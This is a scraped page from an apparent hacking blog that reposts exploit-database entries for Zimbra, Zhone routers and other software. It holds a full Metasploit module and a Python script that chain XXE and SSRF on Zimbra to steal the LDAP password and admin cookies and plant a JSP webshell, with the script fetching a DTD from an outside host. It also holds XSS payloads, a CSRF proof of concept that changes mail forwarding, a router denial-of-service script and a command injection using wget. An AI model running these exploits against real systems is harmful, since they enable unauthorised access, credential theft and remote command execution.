##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF',
'Description' => %q{
This module exploits an XML external entity vulnerability and a
server side request forgery to get unauthenticated code execution
on Zimbra Collaboration Suite. The XML external entity vulnerability
in the Autodiscover Servlet is used to read a Zimbra configuration
file that contains an LDAP password for the 'zimbra' account. The
zimbra credentials are then used to get a user authentication cookie
with an AuthRequest message. Using the user cookie, a server side request
forgery in the Proxy Servlet is used to proxy an AuthRequest with
the 'zimbra' credentials to the admin port to retrieve an admin
cookie. After gaining an admin cookie the Client Upload servlet is
used to upload a JSP webshell that can be triggered from the web
server to get command execution on the host. The issues reportedly
affect Zimbra Collaboration Suite v8.5 to v8.7.11.
This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64
UBUNTU16_64 FOSS edition.
},
'Author' =>
[
'An Trinh', # Discovery
'Khanh Viet Pham', # Discovery
'Jacob Robles' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-9670'],
['CVE', '2019-9621'],
['URL', 'https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html']
],
'Platform' => ['linux'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultOptions' => {
'RPORT' => 8443,
'SSL' => true,
'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
},
'Stance' => Stance::Aggressive,
'DefaultTarget' => 0,
'DisclosureDate' => '2019-03-13' # Blog post date
))
register_options [
OptString.new('TARGETURI', [true, 'Zimbra application base path', '/']),
OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
]
end
def xxe_req(data)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, '/autodiscover'),
'encode_params' => false,
'data' => data
})
fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 503
res
end
def soap_discover(check_soap=false)
xml = REXML::Document.new
xml.add_element('Autodiscover')
xml.root.add_element('Request')
req = xml.root.elements[1]
req.add_element('EMailAddress')
req.add_element('AcceptableResponseSchema')
replace_text = 'REPLACE'
req.elements['EMailAddress'].text = Faker::Internet.email
req.elements['AcceptableResponseSchema'].text = replace_text
doc = rand_text_alpha_lower(4..8)
entity = rand_text_alpha_lower(4..8)
local_file = '/etc/passwd'
res = "<!DOCTYPE #{doc} [<!ELEMENT #{doc} ANY>"
if check_soap
local = "file://#{local_file}"
res << "<!ENTITY #{entity} SYSTEM '#{local}'>]>"
res << "#{xml.to_s.sub(replace_text, "&#{entity};")}"
else
local = "http://#{srvhost_addr}:#{srvport}#{@service_path}"
res << "<!ENTITY % #{entity} SYSTEM '#{local}'>"
res << "%#{entity};]>"
res << "#{xml.to_s.sub(replace_text, "&#{@ent_data};")}"
end
res
end
def soap_auth(zimbra_user, zimbra_pass, admin=true)
urn = admin ? 'urn:zimbraAdmin' : 'urn:zimbraAccount'
xml = REXML::Document.new
xml.add_element(
'soap:Envelope',
{'xmlns:soap' => 'http://www.w3.org/2003/05/soap-envelope'}
)
xml.root.add_element('soap:Body')
body = xml.root.elements[1]
body.add_element(
'AuthRequest',
{'xmlns' => urn}
)
zimbra_acc = body.elements[1]
zimbra_acc.add_element(
'account',
{'by' => 'adminName'}
)
zimbra_acc.add_element('password')
zimbra_acc.elements['account'].text = zimbra_user
zimbra_acc.elements['password'].text = zimbra_pass
xml.to_s
end
def cookie_req(data)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, '/service/soap/'),
'data' => data
})
fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
res
end
def proxy_req(data, auth_cookie)
target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, '/service/proxy/'),
'vars_get' => {'target' => target},
'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
'data' => data,
'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
})
fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
res
end
def upload_file(file_name, contents, cookie)
data = Rex::MIME::Message.new
data.add_part(file_name, nil, nil, 'form-data; name="filename1"')
data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"")
data.add_part("#{rand_text_numeric(2..5)}", nil, nil, 'form-data; name="requestId"')
post_data = data.to_s
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, '/service/extension/clientUploader/upload'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})
end
def check
begin
res = xxe_req(soap_discover(true))
rescue Msf::Exploit::Failed
return CheckCode::Unknown
end
if res.body.include?('zimbra')
return CheckCode::Vulnerable
end
CheckCode::Unknown
end
def on_request_uri(cli, req)
ent_file = rand_text_alpha_lower(4..8)
ent_eval = rand_text_alpha_lower(4..8)
dtd = <<~HERE
<!ENTITY % #{ent_file} SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
<!ENTITY % #{ent_eval} "<!ENTITY #{@ent_data} '<![CDATA[%#{ent_file};]]>'>">
%#{ent_eval};
HERE
send_response(cli, dtd)
end
def primer
datastore['SSL'] = @ssl
res = xxe_req(soap_discover)
fail_with(Failure::UnexpectedReply, 'Password not found') unless res.body =~ /ldap_password.*?value>(.*?)<\/value/m
password = $1
username = 'zimbra'
print_good("Password found: #{password}")
data = soap_auth(username, password, false)
res = cookie_req(data)
fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /ZM_AUTH_TOKEN=([^;]+;)/
auth_cookie = $1
print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
data = soap_auth(username, password)
res = proxy_req(data, auth_cookie)
fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /(ZM_ADMIN_AUTH_TOKEN=[^;]+;)/
admin_cookie = $1
print_good("Admin cookie retrieved: #{admin_cookie}")
stager_name = "#{rand_text_alpha(8..16)}.jsp"
print_status('Uploading jsp shell')
res = upload_file(stager_name, payload.encoded, admin_cookie)
fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") unless res && res.code == 200
# Only shell sessions are supported
register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name}' -type f)")
register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*1StreamConnector.class' -type f)")
register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*class' -type f)")
register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*java' -type f)")
print_status("Executing payload on /downloads/#{stager_name}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri, "/downloads/#{stager_name}"),
'cookie' => admin_cookie
})
end
def exploit
@ent_data = rand_text_alpha_lower(4..8)
@ssl = datastore['SSL']
datastore['SSL'] = false
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863115645
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Xss Zimbra Mail server
# Google Dork:
# Date: 2018/08/10
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/
# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411
Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>
======================================
Multiple CSRF in Zimbra Mail interface
======================================
CVE-2015-6541
Description
===========
Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, enabling to change account
preferences like e-mail forwarding.
CSRF
====
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-352
**CVSS Base score**: 5.8
----------------
Proof of Concept
----------------
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Solution
========
Sensitive forms should be protected by a CSRF token.
Fixes
=====
Fixed with 8.5 release : bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
Affected versions
=================
* Zimbra <= 8.0.9 GA Release
Credits
=======
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
#coding=utf8
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
base_url=sys.argv[1]
base_url=base_url.rstrip("/")
#upload file name and content
#modify by k8gege
#Connect "shell.jsp" using K8fly CmdShell
#Because the CMD parameter is encrypted using Base64(bypass WAF)
filename = "shell.jsp"
fileContent = r'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'
print(base_url)
#dtd file url
dtd_url="https://k8gege.github.io/zimbra.dtd"
"""
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
"""
xxe_data = r"""<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "{dtd}">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>""".format(dtd=dtd_url)
#XXE stage
headers = {
"Content-Type":"application/xml"
}
print("[*] Get User Name/Password By XXE ")
r = requests.post(base_url+"/Autodiscover/Autodiscover.xml",data=xxe_data,headers=headers,verify=False,timeout=15)
#print r.text
if 'response schema not available' not in r.text:
print("have no xxe")
exit()
#low_token Stage
import re
pattern_name = re.compile(r"<key name=(\"|")zimbra_user(\"|")>\n.*?<value>(.*?)<\/value>")
pattern_password = re.compile(r"<key name=(\"|")zimbra_ldap_password(\"|")>\n.*?<value>(.*?)<\/value>")
username = pattern_name.findall(r.text)[0][2]
password = pattern_password.findall(r.text)[0][2]
print(username)
print(password)
auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="{xmlns}">
<account by="adminName">{username}</account>
<password>{password}</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
"""
print("[*] Get Low Privilege Auth Token")
r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)
pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")
low_priv_token = pattern_auth_token.findall(r.text)[0]
#print(low_priv_token)
# SSRF+Get Admin_Token Stage
headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"
headers["Host"]="foo:7071"
print("[*] Get Admin Auth Token By SSRF")
r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password),headers=headers,verify=False)
admin_token =pattern_auth_token.findall(r.text)[0]
#print("ADMIN_TOKEN:"+admin_token)
f = {
'filename1':(None,"whocare",None),
'clientFile':(filename,fileContent,"text/plain"),
'requestId':(None,"12",None),
}
headers ={
"Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"
}
print("[*] Uploading file")
r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)
#print(r.text)
print("Shell: "+base_url+"/downloads/"+filename)
#print("Connect \"shell.jsp\" using K8fly CmdShell\nBecause the CMD parameter is encrypted using Base64(bypass WAF)")
print("[*] Request Result:")
s = requests.session()
r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)
#print(r.text)
print("May need cookie:")
print(headers['Cookie'])
source: https://www.securityfocus.com/bid/51974/info
Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/zimbra/h/calendar?view=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
source: https://www.securityfocus.com/bid/58913/info
Zimbra is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/aspell.php?disctionnary=><script>alert('foo');</script>
# Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
# Date: 02.12.2022
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://zillya.com/
# Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe)
# Version: IS (3.0.2367.0) / TS (3.0.2368.0)
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/vRCZR1kd89Q
Vulnerabiliy Description:
---------------------------------------
Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want
to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often
found in antivirus programs.
You can read the article about AVGater vulnerabilities here:
https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products.
Step by step produce:
---------------------------------------
1 - Attackers create new folder and into malicious file. It can be a DLL or any file.
2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him.
3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that
the current user does not have write permission to.
You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools
4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location.
This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require
authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges.
Advisories:
---------------------------------------
Developers should not allow unauthorized users to restore from quarantine unless necessary.
Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users
should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should
be run with normal privileges.
Disclosure Timeline:
---------------------------------------
13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released.
02.12.2022 - Full disclosure.
# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Zilab Software Inc
# Version : Zilab Remote Console Server 3.2.9
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
# Tested on Windows 10
# CVE : N/A
C:\Users\Administrator>sc qc zrcs
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: zrcs
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Zilab Remote Console Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
source: https://www.securityfocus.com/bid/49491/info
Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Zikula Application Framework 1.3.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?module=theme&type=admin&func=setasdefault&themename=%3Cscript%3Ealert%28docu ment.cookie%29%3C/script%3E
# # # # #
# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://php-form-builder.zigaform.com/
# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
# Demo: http://demo-phpformbuilder.zigaform.com/index.php
# Version: 2.9.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
# Etc...
# # # # #
from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
if(len(sys.argv) != 2):
print '*********************************************************************************'
print ' GPON Zhone R4.0.2.566b D.O.S.'
print ' Tested on'
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski lramirez@websec.mx '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"
Document Title:
===============
Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1591
Download: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip
Release Date:
=============
2015-09-03
Vulnerability Laboratory ID (VL-ID):
====================================
1591
Common Vulnerability Scoring System:
====================================
8.8
Product & Service Introduction:
===============================
At Zhone, Bandwidth Changes Everything™ is more than just a tag line. It is our focus, our fundamental belief and philosophy in
developing carrier and enterprise-grade fiber access solutions for our customers ensuring bandwidth is never a constraint in the future!
(Copy of the Vendor Homepage: http://www.zhone.com/support/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple remote vulnerabilities in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
Vulnerability Disclosure Timeline:
==================================
2015-09-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Zhone
Product: Zhone ADSL2+ 4 Port Bridge (Broadcom) & Zhone ADSL2+ 4 Port Router (Broadcom) 6218-I2-xxx - FW: 03.02.20
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An authentication bypass vulnerability has been discovered in the official in the official Zhone ADSL2+ 4 Port Wireless Bridge & Router (Broadcom).
The vulnerability allows remote attackers to bypass the authentication procedure to compromise the hardware device or service interface.
The first vulnerability is located in the session validation when processing to request via GET (outside the network) the `pvccfg.cgi`,`dnscfg.cgi`
and `password.cgi` files. Thus can results in a reconfiguration by the attacker to compromise the hardware device.
The second vulnerability is located in the backupsettings.conf file access rights. Remote attackers can easily request via curl the backupsettings
of the hardware device. Thus can result in an easy take-over of the hardware device via an information disclosure by accessing the backupsettings.conf.
The security risk of both vulnerabilities are estimated as high with a cvss (common vulnerability scoring system) count of 8.8. Exploitation of the access
privilege issue requires no privilege application user account or user interaction. Successful exploitation of the bug results in hardware device compromise.
Request Method(s):
[+] GET
Vulnerable Model(s):
[+] Zhone ADSL2+ 4 Port Bridge (Broadcom)
[+] Zhone ADSL2+ 4 Port Router (Broadcom)
Affected Firmware:
[+] 03.02.20
Product Name:
[+] 6218-I2-xxx
Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privilege device user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: #1
http://[LOCALHOST]:?/pvccfg.cgi
http://[LOCALHOST]:?/dnscfg.cgi
http://[LOCALHOST]:?/password.cgi (In addition to text storage of sensitive information!)
Note: The links above can be accessed without any authentication in the interface!
PoC: #2
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" ("dXNlcjp1c2Vy" = "user:user" in base64)
Note: Obtaining backup DSL router configurations by an users account authentication!
Security Risk:
==============
The security risk of the both vulnerabilities in the bridge and wireless router interface is estimated as high. (CVSS 8.8)
Credits & Authors:
==================
Mahmoud Khaled - [mahmoud_khld@yahoo.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Vantage Point Security Advisory 2015-002
========================================
Title: Multiple Vulnerabilities found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
Versions affected: < S3.0.501
Severity: Low to medium
Vendor notified: Yes
Reported:
Public release:
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
Summary:
--------
1. Insecure Direct Object Reference (CVE-2014-8356)
---------------------------------------------------
The administrative web application does not enforce authorization on the server side. User access is restricted via Javascript only, by display available functions for each particular user based on their privileges. Low privileged users of the Zhone Router can therefore gain unrestricted access to administrative functionality, e.g. by modifying the javascript responses returned by the Zhone web server.
Affected URL: http://<Router URL>/menuBcm.js
To demonstrate the issue:
1. Set your browser proxy to Burp Suite
2. Add the following option to "Match and Replace". Match for the string 'admin' and replace with your low privilege user:
3. Login to the Zhone Administrative via your browser with Burp Proxy and you will have full administrative access via the Zhone Web Administrative Portal.
2. Admin Password Disclosure (CVE-2014-8357)
--------------------------------------------
Any low-privileged user of the ZHONE Router Web Administrative Portal can obtain all users passwords stored in the ZHONE web server. The ZHONE router uses Base64 encoding to store all users passwords for logging in to the Web Administrative portal. As these passwords are stored in the backup file, a malicious user can obtain all account passwords.
Affected URL: http://<Router URL>/
1. Browse to http://192.168.1.1/backupsettings.html:
2. "View Source" and take note of the sessionKey:
3. Browse to http://<Router
URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session
Key Here>. and all user account passwords will be returned.
3. Remote Code Injection (CVE-2014-9118)
----------------------------------------
Remote Command Injection in ZHONE Router Web Administrative Console
Any user of the ZHONE Router can gain command injection on the router and can execute arbitrary commands on the host operating system via the vulnerable ZHONE router web administrative console.
Affected URL:
/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
Affected Parameter:
ipAddr
4. Stored Cross-Site Scripting
---------------------------------------------------------------------------------------
The zhnsystemconfig.cgi script is vulnerable to a stored cross-site scripting attack.
Sample HTTP Request:
GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA- Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/zhnsystemconfig.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Connection: keep-alive
Affected Parameters:
1. snmpSysName
2. snmpSysLocation
3. snmpSysContact
5. Privilege Escalation via Direct Object Reference to Upload Settings Functionality
---------------------------------------------------------------------------------------
A low-privileged user can patch the router settings via the /uploadsettings.cgi page. With this functionality, the malicious attacker is able to patch the admin and support password, hence gaining full administrative access to the Zhone router.
Sample POST Request:
POST /uploadsettings.cgi HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/updatesettings.html
Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------- 75010019812050198961998600862
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
Content-Length: 88438
-----------------------------75010019812050198961998600862
Content-Disposition: form-data; name="filename"; filename="backupsettings.conf" Content-Type: config/conf
<?xml version="1.0"?> <DslCpeConfig version="3.2">
...
<AdminPassword>dnFmMUJyM3oB</AdminPassword>
...
--- Configuration File Contents ---
</DslCpeConfig>
Fix Information:
----------------
Upgrade to version S3.1.241
Timeline:
---------
2014/10: Issues No. (1 & 2) reported to Zhone
2014/12: Issues No. (1 & 3) reported to Zhone
2015/01: Requested Update
2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/02: Sent P.O.C Video to show how vulnerabilities work
2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
2015/04: Requested Update
2015/04: Issues No. (4 & 5) reported to Zhone
2015/06: Requested Update
2015/08: Requested Update
2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
2015/10: Confirm that all issues has been fixed
About Vantage Point Security:
--------------------
Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.
https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg
Vantage Point Security Advisory 2015-003
========================================
Title: Multiple Remote Code Execution found in ZHONE
Vendor: Zhone
Vendor URL: http://www.zhone.com
Device Model: ZHONE ZNID GPON 2426A
